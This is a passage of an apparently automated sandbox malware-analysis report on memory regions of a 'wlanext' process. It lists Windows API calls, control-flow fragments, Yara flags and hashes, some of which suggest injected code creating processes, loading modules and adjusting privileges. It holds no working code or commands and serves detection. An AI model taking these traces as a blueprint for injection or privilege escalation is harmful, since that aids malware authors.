                                            • Instruction ID: 4552fb0f8ca3f7e827b0a1d84fb8f05e300f399b6c5e4f3c6f980301aa828ef0
                                            • Opcode Fuzzy Hash: 5bc0b5ee1b3b7496bb807e7fa570194f926fa46edc09aaba532142f143b43025
                                            • Instruction Fuzzy Hash: 0F2191B2900605BBD714EF64CC8AFABB7F8EB48B00F14805DF6296B245D774A550CBA4

                                            Control-flow Graph
                                            control_flow_graph 550 bca662-bca687 call bcaf60 553 bca68c-bca6a1 RtlFreeHeap 550->553
                                            APIs
                                            • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00BB3AF8), ref: 00BCA69D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_bb0000_wlanext.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID: .z`
                                            • API String ID: 3298025750-1441809116
                                            • Opcode ID: 46abaa2b41f995f3e336365dc9b2631254c0e5bca6a241af43bde1f4508b1499
                                            • Instruction ID: 7e40df541e1d29bc8b62faa61e108b44ce0dde701cc2582954a36ed6a48d6b41
                                            • Opcode Fuzzy Hash: 46abaa2b41f995f3e336365dc9b2631254c0e5bca6a241af43bde1f4508b1499
                                            • Instruction Fuzzy Hash: 30F05E725002086FD724DF94DD84ED7776DEF44754F154598FA096B145D630B805CBE0

                                            Control-flow Graph
                                            control_flow_graph 554 bca670-bca6a1 call bcaf60 RtlFreeHeap
                                            APIs
                                            • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00BB3AF8), ref: 00BCA69D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_bb0000_wlanext.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID: .z`
                                            • API String ID: 3298025750-1441809116
                                            • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                            • Instruction ID: 6ae8b15cff0dd0fe00d0f1df583d79a857b76ebb84bd5cd8e81cdf27a30670ff
                                            • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                            • Instruction Fuzzy Hash: 1DE04FB12002086BD714DF59CC45EA777ACEF88754F118558FD0857241C630F910CAF0

                                            Control-flow Graph

                                            APIs
                                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00BB836A
                                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00BB838B
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_bb0000_wlanext.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            • Opcode ID: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
                                            • Instruction ID: 3b8ca6f2529ce72748390ce6b334db714a79c1408b3999688dbae31e08dd9b46
                                            • Opcode Fuzzy Hash: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
                                            • Instruction Fuzzy Hash: 5D01DB31A8022D77E720A6949C43FFE77AC9B40F50F050198FF04BA1C1EAD4690647F6

                                            Control-flow Graph
                                            control_flow_graph 572 bb8393-bb839d 573 bb839f 572->573 574 bb8361-bb836e PostThreadMessageW 572->574 575 bb838d-bb8392 574->575 576 bb8370-bb838b call bba480 PostThreadMessageW 574->576 576->575
                                            APIs
                                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00BB836A
                                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00BB838B
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_bb0000_wlanext.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            • Opcode ID: 17c13fc77dd402e97c30cc5c41d4b20e8594a53422bc50813f80961310563cbe
                                            • Instruction ID: 1404648495179b48b0eb269eef7d9013fdb881c753596e1073bd5ec722ef0c00
                                            • Opcode Fuzzy Hash: 17c13fc77dd402e97c30cc5c41d4b20e8594a53422bc50813f80961310563cbe
                                            • Instruction Fuzzy Hash: 36E0261164411439E211412D6C47FFFBA8CEB82F16F0442AEFA44D61C3EBC08446C3F2
                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,00BBF1D2,00BBF1D2,?,00000000,?,?), ref: 00BCA800
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_bb0000_wlanext.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            • Opcode ID: cebc88800f537aebb60e537cebe09de6d928d27c17f95a36b669ac6389352f71
                                            • Instruction ID: 2922afcca70b2d974dd045ff418f2c078b35b46d57dc2b1edc38ec3ebcc14cc3
                                            • Opcode Fuzzy Hash: cebc88800f537aebb60e537cebe09de6d928d27c17f95a36b669ac6389352f71
                                            • Instruction Fuzzy Hash: A5019EB52002046FDB10DF54DC85FE73BA8EF44B54F148499FA4D5B282D931A911CBE0
                                            APIs
                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00BBAD62
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_bb0000_wlanext.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                            • Instruction ID: e32a276c844b3f7779187435aed429a6c362b942f4946111f00a0dec55e5cb36
                                            • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                            • Instruction Fuzzy Hash: 2A011EB5E0020DABDF10EAA4DC42FEEB7B89B54708F0045E9E90997641F671EB188B91
                                            APIs
                                            • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00BCA734
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_bb0000_wlanext.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateInternalProcess
                                            • String ID:
                                            • API String ID: 2186235152-0
                                            • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                            • Instruction ID: f22f34152809c086ef92b3b0225846afb6844a77efe096a8e21c285be5a336ce
                                            • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                            • Instruction Fuzzy Hash: AA01AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97241C630E851CBA4
                                            APIs
                                            • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00BCA734
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_bb0000_wlanext.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateInternalProcess
                                            • String ID:
                                            • API String ID: 2186235152-0
                                            • Opcode ID: 26959028561c3d2f036da4e0273a4ca9c16cd547dc69ee125fe83b7a83a9a4c5
                                            • Instruction ID: c42352cc09650c0afcff33a922dc00187a9672aa4d130ba68ad12d17212540d8
                                            • Opcode Fuzzy Hash: 26959028561c3d2f036da4e0273a4ca9c16cd547dc69ee125fe83b7a83a9a4c5
                                            • Instruction Fuzzy Hash: 6901F2B6208148AFCB04CF98DC80DEB3BA9AF8C314F258258FA5997245C630E841CBA0
                                            APIs
                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,00BBF050,?,?,00000000), ref: 00BC91EC
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_bb0000_wlanext.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateThread
                                            • String ID:
                                            • API String ID: 2422867632-0
                                            • Opcode ID: 973f13a00399e650b7868e8cf60fae81c7cf5cd4fa202be48298fe99500642fb
                                            • Instruction ID: f6af9a9f580c8570a93dcfc008d64cb925e661e76d1b9580c222362450f016da
                                            • Opcode Fuzzy Hash: 973f13a00399e650b7868e8cf60fae81c7cf5cd4fa202be48298fe99500642fb
                                            • Instruction Fuzzy Hash: 3DE06D333802043AE2206599AC03FA7B29CDB81B20F19006AFA0DEA2C1D995F80142A4
                                            APIs
                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,00BBF050,?,?,00000000), ref: 00BC91EC
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_bb0000_wlanext.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateThread
                                            • String ID:
                                            • API String ID: 2422867632-0
                                            • Opcode ID: b7a1eb48f43eb983a6d1d0ad4c0a6b38cef8efb526e412b5818f5ae45d645f28
                                            • Instruction ID: 5fe2b6c53f7593581cf746f33dd0c8c1ec0c1108ee66e5176a9a82969975cb04
                                            • Opcode Fuzzy Hash: b7a1eb48f43eb983a6d1d0ad4c0a6b38cef8efb526e412b5818f5ae45d645f28
                                            • Instruction Fuzzy Hash: 4DF02B363803043AE73065698C07FE777DCCB85F10F190068F649F71C2D592F80142A8
                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,00BBF1D2,00BBF1D2,?,00000000,?,?), ref: 00BCA800
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_bb0000_wlanext.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            • Opcode ID: 32f6bc2f68435f78dba9cd5b297aa9fffe6c51629055841358db246ff3bbd1e9
                                            • Instruction ID: 8bd959f11165ab9ce8bf6ec91e59efbb209ba5d009cd70e7eef2d0c3720fc7c7
                                            • Opcode Fuzzy Hash: 32f6bc2f68435f78dba9cd5b297aa9fffe6c51629055841358db246ff3bbd1e9
                                            • Instruction Fuzzy Hash: D7E022B42002046BCB10DF14EC84FE73BA8EF41B14F20809DFD8A6B682CD31A811CBB0
                                            APIs
                                            • RtlAllocateHeap.NTDLL(00BC4536,?,00BC4CAF,00BC4CAF,?,00BC4536,?,?,?,?,?,00000000,00000000,?), ref: 00BCA65D
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_bb0000_wlanext.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID:
                                            • API String ID: 1279760036-0
                                            • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                            • Instruction ID: 79b497ad07b471b09f6060979a88edf5983599501185a662a2e03f524677356c
                                            • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                            • Instruction Fuzzy Hash: 11E046B1200208ABDB14EF99CC41EA777ACEF88B54F118598FE089B242C630F910CBF0
                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,00BBF1D2,00BBF1D2,?,00000000,?,?), ref: 00BCA800
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_bb0000_wlanext.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                            • Instruction ID: 5ee175c1895c14c2ec7144360eb228ed40b394f35a8c63b070b0bcad965ad10d
                                            • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                            • Instruction Fuzzy Hash: 93E01AB12002086BDB10DF49CC85EE737ADEF88654F118158BA0857241C930E8108BF5
                                            APIs
                                            • SetErrorMode.KERNELBASE(00008003,?,00BB8D14,?), ref: 00BBF6FB
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_bb0000_wlanext.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorMode
                                            • String ID:
                                            • API String ID: 2340568224-0
                                            • Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                            • Instruction ID: 5644b5286670400019993489f494caa9021ab19efcbc5a2bb03eb8c2e8b56a7b
                                            • Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                            • Instruction Fuzzy Hash: F5D05E616503092BE610AAA49C13F6632C8AB44B00F4A00A4F949962C3D990E5008165
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4450373088.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035C0000, based on PE: true
                                            • Associated: 00000005.00000002.4450373088.00000000036E9000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000005.00000002.4450373088.00000000036ED000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000005.00000002.4450373088.000000000375E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_35c0000_wlanext.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 6e72f6729b844c32bcd516ef4aa7cff22f7899c7898634c6f00a5ddaaa5dce2e
                                            • Instruction ID: 3c816cd3c48fe8309a0e7ae132eff44b7827464904e362c0a2fbb68bd7fe47cf
                                            • Opcode Fuzzy Hash: 6e72f6729b844c32bcd516ef4aa7cff22f7899c7898634c6f00a5ddaaa5dce2e
                                            • Instruction Fuzzy Hash: ABB09B71D015C5C5DB51F7604708717790467D1701F19C461D2030751F4779D1D1E275
                                            APIs
                                            • RtlStringFromGUID.NTDLL(00FEE90B,?), ref: 00FEF184
                                            • RtlNtStatusToDosError.NTDLL ref: 00FEF18B
                                            • memcpy.MSVCRT ref: 00FEF1CD
                                            • RtlFreeUnicodeString.NTDLL(?,?,?,?,?,?,00FEE90B,?), ref: 00FEF1E9
                                            • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(\\.\NativeWiFiP,C0000000,00000000,00000000,00000003,40000000,00000000,00000000,?,00000000,?,?,00FEE90B,?), ref: 00FEF208
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00FEF222
                                            • BindIoCompletionCallback.API-MS-WIN-CORE-KERNEL32-LEGACY-L1-1-0(00000000,00FEF100,00000000), ref: 00FEF23E
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00FEF248
                                            • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 00FEF251
                                              • Part of subcall function 00FEF936: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000057,?,00000000,00FE9DC3,00000000,?,00000000,00000001,?,00FE2F27,00000014,?,00000002,00000000,?,?), ref: 00FEF944
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmp
                                            • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: Error$Last$String$BindCallbackCloseCompletionCreateFileFreeFromHandleStatusUnicodememcpy
                                            • String ID: \\.\NativeWiFiP$\\.\NativeWiFiP\
                                            • API String ID: 921034847-3014666177
                                            • Opcode ID: 308497a07bb01e029999f6ec0ea8c682acc4fb569bd24543a4ab8f0bdddbce34
                                            • Instruction ID: 765329090cc25fe7b058e33bf93a0f212a8b3c9a0c382df727ece1f6e1b0d559
                                            • Opcode Fuzzy Hash: 308497a07bb01e029999f6ec0ea8c682acc4fb569bd24543a4ab8f0bdddbce34
                                            • Instruction Fuzzy Hash: 6731AD72E0025AABDB109FA9DC44BBE77BCBF48320F144136FA55E6190EB708905E764
                                            APIs
                                            • memset.MSVCRT ref: 00FE33B7
                                            • GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000028,00000000), ref: 00FE33EE
                                            • OpenProcessToken.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000), ref: 00FE33F5
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00FE3402
                                            • AdjustTokenPrivileges.API-MS-WIN-SECURITY-BASE-L1-1-0(00000000,00000000,?,0000010C,00000000,00000000), ref: 00FE3442
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00FE344C
                                              • Part of subcall function 00FE2B70: TraceMessage.API-MS-WIN-EVENTING-CLASSICPROVIDER-L1-1-0(?,?,0000002B,?,?,00000000), ref: 00FE2B81
                                            • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000,?,0000010C,?), ref: 00FE348F
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmp
• Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: ErrorLastProcessToken$AdjustCloseCurrentHandleMessageOpenPrivilegesTracememset
                                            • String ID:
                                            • API String ID: 2432845927-0
                                            • Opcode ID: c09f57f53d77f4f48aebb31c291ffece0f46c2120aba54d07c437d8629bf4fbe
                                            • Instruction ID: 578384067a3737b63de480c3dbd6ebfaa7df1d9e9d6910af98da0549d2708dc7
                                            • Opcode Fuzzy Hash: c09f57f53d77f4f48aebb31c291ffece0f46c2120aba54d07c437d8629bf4fbe
                                            • Instruction Fuzzy Hash: AF41A172900288AFD716DF568C4CF6A7B6ABF00354F154098F9059B2E6CB71CE80FB55
                                            APIs
                                            • CreateEventW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,00000000,00000000,00000000,-0000001C,?,?,?,?,00FEF8FF,00000000,-0000001C,00000000,00000004,00000000), ref: 00FEF27B
                                            • NtDeviceIoControlFile.NTDLL ref: 00FEF29E
                                            • NtWaitForSingleObject.NTDLL ref: 00FEF2B3
                                            • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000,?,00FEF8FF,00000000,-0000001C,00000000,00000004,00000000,?,00000000,00000003,00000000,?,00000000), ref: 00FEF2C3
                                            • RtlNtStatusToDosError.NTDLL ref: 00FEF2F0
                                            • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00FEF8FF,00000000,-0000001C,00000000,00000004,00000000,?,00000000,00000003,00000000,?,00000000), ref: 00FEF2F7
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmp
• Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: Error$CloseControlCreateDeviceEventFileHandleLastObjectSingleStatusWait
                                            • String ID:
                                            • API String ID: 651683009-0
                                            • Opcode ID: 7a47af04813607dde3733906467fb780b0fa30586bb54f5823944097e9e9a560
                                            • Instruction ID: 814dff7784b9218ec6d9b2955dcab76fcf73a02257f10bfedaec34993f4ad34d
                                            • Opcode Fuzzy Hash: 7a47af04813607dde3733906467fb780b0fa30586bb54f5823944097e9e9a560
                                            • Instruction Fuzzy Hash: F2116D7AA01119BFDB159FA58C48FBB3AADEF89760F110024FA05E7240DA31DC00EBA0
                                            APIs
                                            • GetSystemTimeAsFileTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000000), ref: 00FEFF72
                                            • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00FEFF81
                                            • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00FEFF8A
                                            • GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 00FEFF93
                                            • QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?), ref: 00FEFFA8
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmp
• Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                            • String ID:
                                            • API String ID: 1445889803-0
                                            • Opcode ID: 947b1dd1bfb1f5b269a861fca3525885ab75828ebfa0f2d4f814b3c6bd71c08a
                                            • Instruction ID: 5cdb1c7a101e0dab20e20c35a31c792f3028705b473dbf6682ab07216f4e6d21
                                            • Opcode Fuzzy Hash: 947b1dd1bfb1f5b269a861fca3525885ab75828ebfa0f2d4f814b3c6bd71c08a
                                            • Instruction Fuzzy Hash: AB114C76D00248EBCB10DFB9D948AAEB7F8FF48311F5148A6D402E7214EB309A44EB50
                                            APIs
                                            • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00FF0199,00FE1000), ref: 00FF006A
                                            • UnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00FF0199,?,00FF0199,00FE1000), ref: 00FF0073
                                            • GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(C0000409,?,00FF0199,00FE1000), ref: 00FF007E
                                            • TerminateProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000,?,00FF0199,00FE1000), ref: 00FF0085
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmp
• Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                            • String ID:
                                            • API String ID: 3231755760-0
                                            • Opcode ID: ecf2f14e43c51dd30463f6520063881c60a4281852854236be2bd239eed4960a
                                            • Instruction ID: 84f7f0118dc3bffad4ecdd6dbd785e1bad48a88e65c1dbd7dacf7f64c9c0aab2
                                            • Opcode Fuzzy Hash: ecf2f14e43c51dd30463f6520063881c60a4281852854236be2bd239eed4960a
                                            • Instruction Fuzzy Hash: B3D0C93300010CABDB902BE1ED0CEA93E2CEF44212F000000F30D82021CE314441FB65
                                            APIs
                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,00000000,?,?,?,?,00FEE417,000003E4), ref: 00FEE66E
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00FEE417,000003E4), ref: 00FEE67C
                                            • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?,?,00FEE417,000003E4), ref: 00FEE6BE
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00FEE417,000003E4), ref: 00FEE6F6
                                              • Part of subcall function 00FEE47B: TraceMessage.API-MS-WIN-EVENTING-CLASSICPROVIDER-L1-1-0(?,00FEE5E0,0000002B,00FE27D0,0000000B,?,00000005,0000000E,00000004,00000000,00000004,00000000,00000000,0000000E,?,00FEE5E0), ref: 00FEE4C4
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmp
• Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: ErrorHeapLast$FreeMessageProcessTrace
                                            • String ID:
                                            • API String ID: 782704287-0
                                            • Opcode ID: 1a564ca289c2df7b04152a8a405293ef0945f558b61a2fbc4497d5b38689e3a8
                                            • Instruction ID: fc7b82061e1a450a8f9446b684969713903a48819f67284f818603b70013d65f
                                            • Opcode Fuzzy Hash: 1a564ca289c2df7b04152a8a405293ef0945f558b61a2fbc4497d5b38689e3a8
                                            • Instruction Fuzzy Hash: DE21F472500284EBCB2A5F96EC44F793E6AFF88390F240418FA01461B6DB72CC92FB50
                                            APIs
                                            • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(Function_0000FCD0), ref: 00FEFD25
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmp
• Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled
                                            • String ID:
                                            • API String ID: 3192549508-0
                                            • Opcode ID: 212c95047942e403bfa6216f3db472d551c27a1aa18f53302e3f783af487eab7
                                            • Instruction ID: 2f0568e08353ed546a9b10b590ff6eb353dcd02d4f51f7fb6bad0619f5ca4c05
                                            • Opcode Fuzzy Hash: 212c95047942e403bfa6216f3db472d551c27a1aa18f53302e3f783af487eab7
